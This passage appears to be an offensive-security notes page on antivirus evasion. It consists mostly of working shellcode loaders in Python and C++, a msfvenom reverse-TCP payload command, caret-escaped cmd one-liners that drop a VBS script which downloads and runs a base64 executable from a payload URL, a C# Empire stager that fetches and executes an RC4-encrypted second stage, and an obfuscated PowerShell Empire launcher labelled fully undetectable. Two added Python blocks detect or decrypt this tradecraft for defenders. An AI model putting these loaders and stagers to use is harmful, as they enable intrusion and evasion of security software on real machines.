ctypes.windll.kernel32.RtlMoveMemory(ctypes.c_int(memorywithshell),
                                     buf,
                                     ctypes.c_int(len(shellcode)))
shell = cast(memorywithshell, CFUNCTYPE(c_void_p))
shell()
```


____________________________________________________________________________________________________________________
// C++

```cpp
#include "stdio.h"
#include "windows.h"
#pragma comment(linker, "/subsystem:\"windows\" /entry:\"mainCRTStartup\"") // run without showing a console window

// shellcode
unsigned char buf[] = "";

void run(void* buffer) {
	void(*function)();
	function = (void (*)())buffer;
	function();
}

int main()
{
	LPVOID ptr = VirtualAlloc(0, sizeof(buf), MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE);
	RtlMoveMemory(ptr, buf, sizeof(buf));
	HANDLE ht = CreateThread(0, 0, (LPTHREAD_START_ROUTINE)&run, ptr, 0, NULL);
	WaitForSingleObject(ht, INFINITE);
	return 0;
}
```

____________________________________________________________________________________________________________________

```cpp
#include "stdio.h"
#include "windows.h"
#pragma comment(linker, "/subsystem:\"windows\" /entry:\"mainCRTStartup\"")
#pragma comment(linker, "/section:.data,RWE") // make .data executable so the buffer can be jumped into

unsigned char buf[] = "";

int main()
{
	// MSVC x86 inline assembly: jump straight into the buffer in the RWE .data section
	__asm
	{
		mov eax, offset buf
		jmp eax
	}
	return 0;
}
```

____________________________________________________________________________________________________________________
//cobaltstrike

```cpp
#include "stdio.h"
#include "windows.h"
#pragma comment(linker, "/subsystem:\"windows\" /entry:\"mainCRTStartup\"")
#pragma comment(linker, "/section:.data,RWE")

unsigned char buf[] = "";

void run(void* buffer) {
	void(*function)();
	function = (void (*)())buffer;
	function();
}

int main()
{
    // private heap created with HEAP_CREATE_ENABLE_EXECUTE, so allocations from it are executable
    HANDLE heapp = HeapCreate(HEAP_CREATE_ENABLE_EXECUTE, 0, 0);
    void* ptr = HeapAlloc(heapp, 0, sizeof(buf));
    RtlMoveMemory(ptr, buf, sizeof(buf));
    HANDLE ht = CreateThread(NULL, 0, (LPTHREAD_START_ROUTINE)&run, ptr, 0, NULL);
    WaitForSingleObject(ht, INFINITE);
    return 0;
}
```


____________________________________________________________________________________________________________________

```cpp
#include <Windows.h>
#include <stdio.h>
#include <intrin.h>

#define BUFF_SIZE 1024
char buf[] = "";
PTCHAR ptsPipeName = TEXT("\\\\.\\pipe\\BadCodeTest");

// Client side: runs on a second thread, connects to the named pipe and writes the buffer into it
BOOL RecvShellcode(VOID){
    HANDLE hPipeClient;
    DWORD dwWritten;
    DWORD dwShellcodeSize = sizeof(buf);

    WaitNamedPipe(ptsPipeName, NMPWAIT_WAIT_FOREVER);

    hPipeClient = CreateFile(ptsPipeName, GENERIC_WRITE, FILE_SHARE_READ, NULL, OPEN_EXISTING, FILE_ATTRIBUTE_NORMAL, NULL);

    if(hPipeClient == INVALID_HANDLE_VALUE){
        printf("[+]Can't Open Pipe , Error : %lu \n", GetLastError());
        return FALSE;
    }

    WriteFile(hPipeClient, buf, dwShellcodeSize, &dwWritten, NULL);
    if(dwWritten == dwShellcodeSize){
        CloseHandle(hPipeClient);
        printf("[+]Send Success ! Shellcode : %lu Bytes\n", dwShellcodeSize);
        return TRUE;
    }
    CloseHandle(hPipeClient);
    return FALSE;
}


int wmain(int argc, TCHAR * argv[]){

    HANDLE hPipe;
    DWORD dwError;
    CHAR szBuffer[BUFF_SIZE];
    DWORD dwLen;
    PCHAR pszShellcode = NULL;
    DWORD dwOldProtect;
    HANDLE hThread;
    DWORD dwThreadId;
    //:https://docs.microsoft.com/zh-cn/windows/win32/api/winbase/nf-winbase-createnamedpipea
    hPipe = CreateNamedPipe(
        ptsPipeName,
        PIPE_ACCESS_INBOUND,
        PIPE_TYPE_BYTE | PIPE_WAIT,
        PIPE_UNLIMITED_INSTANCES,
        BUFF_SIZE,
        BUFF_SIZE,
        0,
        NULL);

    if(hPipe == INVALID_HANDLE_VALUE){
        dwError = GetLastError();
        printf("[-]Create Pipe Error : %lu \n", dwError);
        return dwError;
    }

    CreateThread(NULL, 0, (LPTHREAD_START_ROUTINE)RecvShellcode, NULL, 0, NULL);

    if(ConnectNamedPipe(hPipe, NULL) > 0){
        printf("[+]Client Connected...\n");
        ReadFile(hPipe, szBuffer, BUFF_SIZE, &dwLen, NULL);
        printf("[+]Get DATA Length : %lu \n", dwLen);

        pszShellcode = (PCHAR)VirtualAlloc(NULL, dwLen, MEM_COMMIT, PAGE_READWRITE);

        CopyMemory(pszShellcode, szBuffer, dwLen);

        // the buffer was stored XORed with 10; undo that one byte at a time, with a delay between bytes
        for(DWORD i = 0; i < dwLen; i++){
            Sleep(50);
            _InterlockedXor8(pszShellcode + i, 10);
        }


        VirtualProtect(pszShellcode, dwLen, PAGE_EXECUTE, &dwOldProtect);
        // Shellcode
        hThread = CreateThread(
            NULL,
            0,
            (LPTHREAD_START_ROUTINE)pszShellcode,
            NULL,
            0,
            &dwThreadId
        );

        WaitForSingleObject(hThread, INFINITE);
    }

    return 0;
}
```

https://github.com/sayhi2urmom/Antivirus_R3_bypass_demo

https://github.com/blackc03r/OSCP-Cheatsheets/blob/master/offensive-security/defense-evasion/bypassing-windows-defender-one-tcp-socket-away-from-meterpreter-and-cobalt-strike-beacon.md

Execute metasploit vbs payload in cmd shell

If you are a pentester or researcher, you may sometimes want to obtain a meterpreter session from a plain cmd shell (for example one obtained through sqlmap --os-shell or a similar tool). For example:

```
$ ncat -l -p 4444
Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.

C:\Documents and Settings\test\Desktop>ver
ver

Microsoft Windows XP [Version 5.1.2600]
C:\Documents and Settings\test\Desktop>
```

In that situation, you might have tried the following methods:

  • a. translate the exe into a batch script.
  • b. download the payload file from a remote server (ftp, tftp, http, ....)
  • c. ....

Now, I'll show you how to run a metasploit payload in cmd.exe. Please think about the following questions first:

  1. How to generate a payload with msfvenom ?
  2. How to run payload in a simple/compatible way ?

How to generate a payload with msfvenom ?

In order to test the payload on Windows XP/2003, we choose the vbs format. If you need help, try `msfvenom -h`.

```
$ msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.1.100 LPORT=4444 -f vbs --arch x86 --platform win

No encoder or badchars specified, outputting raw payload
Payload size: 333 bytes
Final size of vbs file: 7370 bytes
Function oSpLpsWeU(XwXDDtdR)
  urGQiYVn = "" & _
  XwXDDtdR & ""
  Set gFMdOBBiLZ = CreateObject("MSXML2.DOMDocument.3.0")
  gFMdOBBiLZ.LoadXML(urGQiYVn)
  oSpLpsWeU = gFMdOBBiLZ.selectsinglenode("B64DECODE").nodeTypedValue
  set gFMdOBBiLZ = nothing
End Function

Function skbfzWOqR()
  cTENSbYbnWY = "<base64-encoded PE payload omitted>"
  Dim GBHMAfCsea
  Set GBHMAfCsea = CreateObject("Scripting.FileSystemObject")
  Dim nYosrMtHSIOKSTI
  Dim LNXsqHXEKZQU
  Set nYosrMtHSIOKSTI = GBHMAfCsea.GetSpecialFolder(2)
  LNXsqHXEKZQU = nYosrMtHSIOKSTI & "\" & GBHMAfCsea.GetTempName()
  GBHMAfCsea.CreateFolder(LNXsqHXEKZQU)
  YeQZhbvaLPekFW = LNXsqHXEKZQU & "\" & "QoziwORKliqRDPs.exe"
  Dim voFeIDpffjdo
  Set voFeIDpffjdo = CreateObject("Wscript.Shell")
  WwqoNcaCIbw = oSpLpsWeU(cTENSbYbnWY)
  Set WQwWDbhse = CreateObject("ADODB.Stream")
  WQwWDbhse.Type = 1
  WQwWDbhse.Open
  WQwWDbhse.Write WwqoNcaCIbw
  WQwWDbhse.SaveToFile YeQZhbvaLPekFW, 2
  voFeIDpffjdo.run YeQZhbvaLPekFW, 0, true
  GBHMAfCsea.DeleteFile(YeQZhbvaLPekFW)
  GBHMAfCsea.DeleteFolder(LNXsqHXEKZQU)
End Function

skbfzWOqR
```

How to run payload in a simple/compatible way ?

Reading that code, we can write a simple vbs script called msf.vbs that takes the base64 payload as its argument and executes it. A vbs script runs on Windows XP/2003/Vista/7/8/10/2008/2012/....

```vb
shellcode = WScript.Arguments.Item(0)
strXML = "" & shellcode & ""
Set oXMLDoc = CreateObject("MSXML2.DOMDocument.3.0")
oXMLDoc.LoadXML(strXML)
decode = oXMLDoc.selectsinglenode("B64DECODE").nodeTypedValue
set oXMLDoc = nothing
Dim fso
Set fso = CreateObject("Scripting.FileSystemObject")
Dim tempdir
Dim basedir
Set tempdir = fso.GetSpecialFolder(2)
basedir = tempdir & "\" & fso.GetTempName()
fso.CreateFolder(basedir)
tempexe = basedir & "\" & "test.exe"
Dim adodbstream
Set adodbstream = CreateObject("ADODB.Stream")
adodbstream.Type = 1
adodbstream.Open
adodbstream.Write decode
adodbstream.SaveToFile tempexe, 2
Dim wshell
Set wshell = CreateObject("Wscript.Shell")
wshell.run tempexe, 0, true
fso.DeleteFile(tempexe)
fso.DeleteFolder(basedir)
```

OK, but how do we get it onto the box from cmd.exe? Pasting the code line by line is impractical, so a single command is built as follows:

Upload msf.vbs to the vulnerable lab host with a single command (all quotes and redirection characters are caret-escaped for cmd.exe):

```
echo shellcode = WScript.Arguments.Item(0):strXML = ^"^^" ^& shellcode ^& ^"^<^/B64DECODE^>^":Set oXMLDoc = CreateObject(^"MSXML2.DOMDocument.3.0^"):oXMLDoc.LoadXML(strXML):decode = oXMLDoc.selectsinglenode(^"B64DECODE^").nodeTypedValue:set oXMLDoc = nothing:Dim fso:Set fso = CreateObject(^"Scripting.FileSystemObject^"):Dim tempdir:Dim basedir:Set tempdir = fso.GetSpecialFolder(2):basedir = tempdir ^& ^"\^" ^& fso.GetTempName():fso.CreateFolder(basedir):tempexe = basedir ^& ^"\^" ^& ^"test.exe^":Dim adodbstream:Set adodbstream = CreateObject(^"ADODB.Stream^"):adodbstream.Type = 1:adodbstream.Open:adodbstream.Write decode:adodbstream.SaveToFile tempexe, 2:Dim wshell:Set wshell = CreateObject(^"Wscript.Shell^"):wshell.run tempexe, 0, true:fso.DeleteFile(tempexe):fso.DeleteFolder(basedir) > %TEMP%\msf.vbs
```

Execute the metasploit payload with msf.vbs and cscript.exe:

```
C:\Documents and Settings\test\Desktop> cscript.exe msf.vbs <msf-vbs-shellcode>
```

Bypass nc shell buffer size limit

If the script is used in cmd.exe on localhost, everything goes well. But if it is used in a netcat cmd shell, the payload argument gets truncated and the script breaks, e.g.:

```
C:\Documents and Settings\test\Desktop>cscript.exe %TEMP%\msf.vbs TVqQAAMAA.....AAAAAP

Microsoft (R) Windows Script Host Version 5.7
Copyright (C) Microsoft Corporation. All rights reserved.

C:\DOCUME~1\test\LOCALS~1\Temp\msf.vbs(1, 53) Microsoft VBScript compilation error: Syntax error
```

  • original payload size: 6160
  • payload size as received through netcat: 4068

Please try it yourself. For security tests, another vbs script is created that fetches the base64 payload over HTTP (MSXML2.XMLHTTP) instead of taking it on the command line, so the argument stays short:

```
echo strFileURL = WScript.Arguments.Item(0):Set objXMLHTTP = CreateObject(^"MSXML2.XMLHTTP^"):objXMLHTTP.open ^"GET^", strFileURL, false:objXMLHTTP.send():shellcode = objXMLHTTP.responseText:strXML = ^"^<B64DECODE xmlns:dt=^" ^& Chr(34) ^& ^"urn:schemas-microsoft-com:datatypes^" ^& Chr(34) ^& ^" ^" ^& ^"dt:dt=^" ^& Chr(34) ^& ^"bin.base64^" ^& Chr(34) ^& ^"^>^" ^& shellcode ^& ^"^<^/B64DECODE^>^":Set oXMLDoc = CreateObject(^"MSXML2.DOMDocument.3.0^"):oXMLDoc.LoadXML(strXML):decode = oXMLDoc.selectsinglenode(^"B64DECODE^").nodeTypedValue:set oXMLDoc = nothing:Dim fso:Set fso = CreateObject(^"Scripting.FileSystemObject^"):Dim tempdir:Dim basedir:Set tempdir = fso.GetSpecialFolder(2):basedir = tempdir ^& ^"\^" ^& fso.GetTempName():fso.CreateFolder(basedir):tempexe = basedir ^& ^"\^" ^& ^"test.exe^":Dim adodbstream:Set adodbstream = CreateObject(^"ADODB.Stream^"):adodbstream.Type = 1:adodbstream.Open:adodbstream.Write decode:adodbstream.SaveToFile tempexe, 2:Dim wshell:Set wshell = CreateObject(^"Wscript.Shell^"):wshell.run tempexe, 0, true:fso.DeleteFile(tempexe):fso.DeleteFolder(basedir):Set fso = Nothing > %TEMP%\msf.vbs
```

Run the following command to execute your vbs payload:

```
START /B cscript.exe %TEMP%\msf.vbs http://192.168.1.100:8080/payload.txt
```
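As an added defender-side example (not part of the original post), here is a small Python triage routine that scores process-creation command lines for the indicators the msf.vbs technique leaves behind: an echo one-liner redirected into a .vbs under %TEMP%, the MSXML2.DOMDocument/B64DECODE decode trick, ADODB.Stream SaveToFile, the MSXML2.XMLHTTP download variant, and cscript.exe launched against a %TEMP% script with a URL or long base64 argument. The log records are constructed in the shape of Sysmon Event ID 1 fields; the indicator weights and alert threshold are my assumptions.

```python
import re

# Indicator groups: each earns its weight once per command line if any of its
# patterns matches. Weights and threshold are assumptions; tune them locally.
INDICATORS = {
    # echo one-liner redirected into a .vbs under %TEMP%. cmd.exe expands
    # %TEMP% before the child process is logged, so a literal ...\Temp\ path
    # is matched as well.
    "echo_to_temp_vbs": (3, [r"(?i)\becho\b.*>\s*(?:%TEMP%|\\Temp)\\\S+\.vbs"]),
    # base64 decode through an MSXML DOMDocument node typed bin.base64
    "msxml_b64decode": (3, [r"(?i)MSXML2\.DOMDocument", r"(?i)bin\.base64", r"(?i)B64DECODE"]),
    # ADODB.Stream used to write the decoded bytes to disk
    "adodb_save_to_file": (2, [r"(?i)ADODB\.Stream", r"(?i)SaveToFile"]),
    # script host run on a %TEMP% script with a URL or a long base64 argument
    "script_host_temp_payload": (5, [
        r"(?i)\b[cw]script\.exe\s+\S*(?:%TEMP%|\\Temp)\\\S+\.vbs\s+"
        r"(?:https?://\S+|[A-Za-z0-9+/=]{40,})",
    ]),
    # in-script download of the payload text (the netcat-safe variant)
    "xmlhttp_download": (1, [r"(?i)MSXML2\.XMLHTTP", r"(?i)responseText"]),
}
ALERT_THRESHOLD = 5


def score_command_line(cmdline):
    """Return (score, [matched indicator names]) for a single command line."""
    score, hits = 0, []
    for name, (weight, patterns) in INDICATORS.items():
        if any(re.search(p, cmdline) for p in patterns):
            score += weight
            hits.append(name)
    return score, hits


def triage(records):
    """Return the records that reach ALERT_THRESHOLD, annotated with their hits."""
    alerts = []
    for rec in records:
        score, hits = score_command_line(rec["CommandLine"])
        if score >= ALERT_THRESHOLD:
            alerts.append(dict(rec, Score=score, Indicators=hits))
    return alerts


# Constructed Sysmon Event ID 1 style records (not real telemetry). An echo
# typed into an interactive cmd.exe creates no process, so in that case only
# the cscript.exe launch (plus a FileCreate event for msf.vbs) is visible; the
# "cmd.exe /c echo ..." form appears when a tool such as sqlmap runs it.
SAMPLE_RECORDS = [
    {"Image": r"C:\Windows\System32\cscript.exe",
     "CommandLine": r"cscript.exe //nologo C:\Scripts\inventory.vbs"},
    {"Image": r"C:\Windows\System32\cmd.exe",
     "CommandLine": r'cmd.exe /c echo shellcode = WScript.Arguments.Item(0):'
                    r'Set oXMLDoc = CreateObject(^"MSXML2.DOMDocument.3.0^"):'
                    r'decode = oXMLDoc.selectsinglenode(^"B64DECODE^").nodeTypedValue:'
                    r'Set adodbstream = CreateObject(^"ADODB.Stream^"):'
                    r'adodbstream.SaveToFile tempexe, 2 > %TEMP%\msf.vbs'},
    {"Image": r"C:\Windows\System32\cscript.exe",
     "CommandLine": r"cscript.exe C:\DOCUME~1\test\LOCALS~1\Temp\msf.vbs "
                    r"http://192.0.2.10:8080/payload.txt"},
    {"Image": r"C:\Windows\System32\cmd.exe",
     "CommandLine": r'cmd.exe /c echo strFileURL = WScript.Arguments.Item(0):'
                    r'Set objXMLHTTP = CreateObject(^"MSXML2.XMLHTTP^"):'
                    r'shellcode = objXMLHTTP.responseText:'
                    r'Set oXMLDoc = CreateObject(^"MSXML2.DOMDocument.3.0^"):'
                    r'Set adodbstream = CreateObject(^"ADODB.Stream^"):'
                    r'adodbstream.SaveToFile tempexe, 2 > %TEMP%\msf.vbs'},
]

if __name__ == "__main__":
    for alert in triage(SAMPLE_RECORDS):
        print(alert["Score"], alert["Indicators"], alert["CommandLine"][:60])
```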

ByPassAV Empire-PowerShell part 1

```csharp
using System;
using System.Collections.Generic;
using System.Linq;
using System.Management.Automation;
using System.Net;
using System.Runtime.InteropServices;
using System.Text;
using System.Threading.Tasks;

namespace PSEmpire_Stage1
{
    class Program
    {
        // RC4 Class to decrypt the stage 2 data
        // Created by Jeong ChangWook. Source https://gist.github.com/hoiogi/89cf2e9aa99ffc3640a4
        public class RC4
        {
            public static byte[] Encrypt(byte[] pwd, byte[] data)
            {
                int a, i, j, k, tmp;
                int[] key, box;
                byte[] cipher;

                key = new int[256];
                box = new int[256];
                cipher = new byte[data.Length];

                for (i = 0; i < 256; i++)
                {
                    key[i] = pwd[i % pwd.Length];
                    box[i] = i;
                }
                for (j = i = 0; i < 256; i++)
                {
                    j = (j + box[i] + key[i]) % 256;
                    tmp = box[i];
                    box[i] = box[j];
                    box[j] = tmp;
                }
                for (a = j = i = 0; i < data.Length; i++)
                {
                    a++;
                    a %= 256;
                    j += box[a];
                    j %= 256;
                    tmp = box[a];
                    box[a] = box[j];
                    box[j] = tmp;
                    k = box[((box[a] + box[j]) % 256)];
                    cipher[i] = (byte)(data[i] ^ k);
                }
                return cipher;
            }

            public static byte[] Decrypt(byte[] pwd, byte[] data)
            {
                return Encrypt(pwd, data);
            }

        }

        // Hide Windows function by our friends from StackOverFlow
        // https://stackoverflow.com/questions/34440916/hide-the-console-window-from-a-console-application
        [DllImport("kernel32.dll")]
        static extern IntPtr GetConsoleWindow();

        [DllImport("user32.dll")]
        static extern bool ShowWindow(IntPtr hWnd, int nCmdShow);

        static void Main(string[] args)
        {
            // To Hide the ConsoleWindow (It may be a better way...)
            var handle = GetConsoleWindow();
            ShowWindow(handle, 0);

            // Avoid sending Expect 100 Header
            System.Net.ServicePointManager.Expect100Continue = false;

            // Create a WebClient Object (No Proxy Support Included)
            WebClient wc = new WebClient();
            string ua = "Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko";
            wc.Headers["User-Agent"] = ua;
            wc.Headers["Cookie"] = "session=968PH6bE9CDkwYGfsUPraz0x5PQ=";

            // Set the Server Address and URL
            string server = "http://192.168.6.119:8081";
            string target = "/CWoNaJLBo/VTNeWw11212/";

            // Download The Data or Stage 2
            byte[] data = wc.DownloadData(server + target);

            // Extract IV
            byte[] iv = data.Take(4).Select(i => i).ToArray();

            // Remove the IV from the data
            byte[] data_noIV = data.Skip(4).ToArray();

            // Set Key value for decryption. PowerEmpire StagingKey value
            string key = "fdcece0a22c10f83dccc8f17c95a33d4";
            byte[] K = Encoding.ASCII.GetBytes(key);

            // Combine the IV + Key (New random key each time)
            byte[] IVK = new byte[iv.Length + K.Length];
            iv.CopyTo(IVK, 0);
            K.CopyTo(IVK, iv.Length);

            // Decrypt the Message
            byte[] decrypted = RC4.Decrypt(IVK, data_noIV);

            // Convert the stage2 decrypted message from bytes to ASCII
            string stage2 = System.Text.Encoding.ASCII.GetString(decrypted);

            // Create a PowerShell Object to execute the command
            PowerShell PowerShellInstance = PowerShell.Create();

            // Create the variables $ser and $u which are part of the downloaded stage2
            PowerShellInstance.Runspace.SessionStateProxy.SetVariable("ser", server);
            PowerShellInstance.Runspace.SessionStateProxy.SetVariable("u", ua);

            // Add the Script Stage 2 to the Powershell Object
            PowerShellInstance.AddScript(stage2);

            // Execute the Script!
            PowerShellInstance.Invoke();

        }
    }
}
```

compile:

```
csc.exe PSEmpireStage1.cs /reference:C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll
```

For more details see video
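As an added example for analysts (not code from the original page or from Empire), the Python below reverses the stage-2 layout the C# stager above implements: the first 4 bytes of the HTTP response are the IV, the rest is RC4 ciphertext keyed with IV + ASCII staging key. It also tries a list of candidate staging keys against a captured blob, which is what you need when triaging a stager pulled from a PCAP and several server configs are on hand; the staging key, IV and stage-2 text used as sample data are constructed.

```python
# Recover an Empire stage-2 script from a captured stager response: 4-byte IV,
# then RC4 ciphertext keyed with IV + staging key. Added analyst example; the
# SAMPLE_* values below are constructed, not real traffic or a real key.
IV_LEN = 4


def rc4(key: bytes, data: bytes) -> bytes:
    """Standard RC4 (same KSA and PRGA as the C# RC4 class above); symmetric."""
    s = list(range(256))
    j = 0
    for i in range(256):                       # key scheduling
        j = (j + s[i] + key[i % len(key)]) & 0xFF
        s[i], s[j] = s[j], s[i]
    out = bytearray()
    i = j = 0
    for byte in data:                          # keystream generation and XOR
        i = (i + 1) & 0xFF
        j = (j + s[i]) & 0xFF
        s[i], s[j] = s[j], s[i]
        out.append(byte ^ s[(s[i] + s[j]) & 0xFF])
    return bytes(out)


def decrypt_empire_stage(blob: bytes, staging_key: str) -> bytes:
    """Split off the IV and decrypt the rest with RC4(IV || staging_key)."""
    if len(blob) <= IV_LEN:
        raise ValueError("blob too short to contain an IV and ciphertext")
    iv, body = blob[:IV_LEN], blob[IV_LEN:]
    return rc4(iv + staging_key.encode("ascii"), body)


def encrypt_empire_stage(script: bytes, staging_key: str, iv: bytes) -> bytes:
    """Inverse of decrypt_empire_stage; used here only to build sample data."""
    if len(iv) != IV_LEN:
        raise ValueError("IV must be %d bytes" % IV_LEN)
    return iv + rc4(iv + staging_key.encode("ascii"), script)


def looks_like_powershell(candidate: bytes) -> bool:
    """Cheap plausibility check: ASCII text carrying PowerShell markers."""
    try:
        text = candidate.decode("ascii")
    except UnicodeDecodeError:
        return False
    lowered = text.lower()
    return "$" in text and any(m in lowered for m in ("function", "invoke-", "iex"))


def recover_stage(blob: bytes, staging_keys):
    """Try each candidate staging key (e.g. from recovered server configs) and
    return (key, script) for the first decryption that looks like PowerShell,
    or None. A wrong RC4 key yields high-entropy bytes, so the check is cheap."""
    for key in staging_keys:
        plain = decrypt_empire_stage(blob, key)
        if looks_like_powershell(plain):
            return key, plain
    return None


# Constructed sample: a fake 32-character staging key, a fixed IV and a toy
# stage-2 body referencing the $ser and $u variables the stager sets.
SAMPLE_KEY = "0123456789abcdef0123456789abcdef"
SAMPLE_IV = b"\x13\x37\x00\x01"
SAMPLE_SCRIPT = b"function Invoke-Stage2 { $ser; $u; IEX $data }"
SAMPLE_BLOB = encrypt_empire_stage(SAMPLE_SCRIPT, SAMPLE_KEY, SAMPLE_IV)

if __name__ == "__main__":
    print(recover_stage(SAMPLE_BLOB, ["wrongkeywrongkeywrongkeywrongkey", SAMPLE_KEY]))
```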

ByPassAV Empire-PowerShell part 2

360 fud

"[SYsTem.NET.SErvIcePOInTMANAgER]::EXPecT100CONtiNuE=0;$WC=NEW-OBjECT SYstem.NeT.WEBCliENt;$u='Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0)
like Gecko';$WC.HeAdErS.Add('User-Agent',$u);$WC.PRoxY= [SYStem.NEt.WEbREqUEsT]::DEfaulTWEBPrOxY;$WC.ProxY.CreDEnTials = [SySTEm.NET.CreDenTIalCache]::DeFAUltNETWOrkCReDentIALs;$Script:Proxy = $wc.Proxy;$K= [SYStEm.TeXT.ENCodiNG]::ASCII.GEtBytES('JV+~fgh!GFWZ8=eiEN{[#}&x_XLtHKT7');$R= {$D,$K=$ArgS;$S=0..255;0..255|%{$J=($J-(-$S[$_])- (-$K[$_%$K.CoUnt]))%256;$S[$_],$S[$J]=$S[$J],$S[$_]};$D|%{$I=($I+1)%256;$H= ($H+$S[$I])%256;$S[$I],$S[$H]=$S[$H],$S[$I];$_- bXoR$S[($S[$I]+$S[$H])%256]}};$ser='http://172.16.3.77:80';$t='/news.php';$Wc.HEaDERs.AD joIN[ChAr[]](& $R $datA ($IV+$K))|IEX"

fully-undetectable-backdooring-pe-file

PowerEmpire-Stage-1-to-CSharp
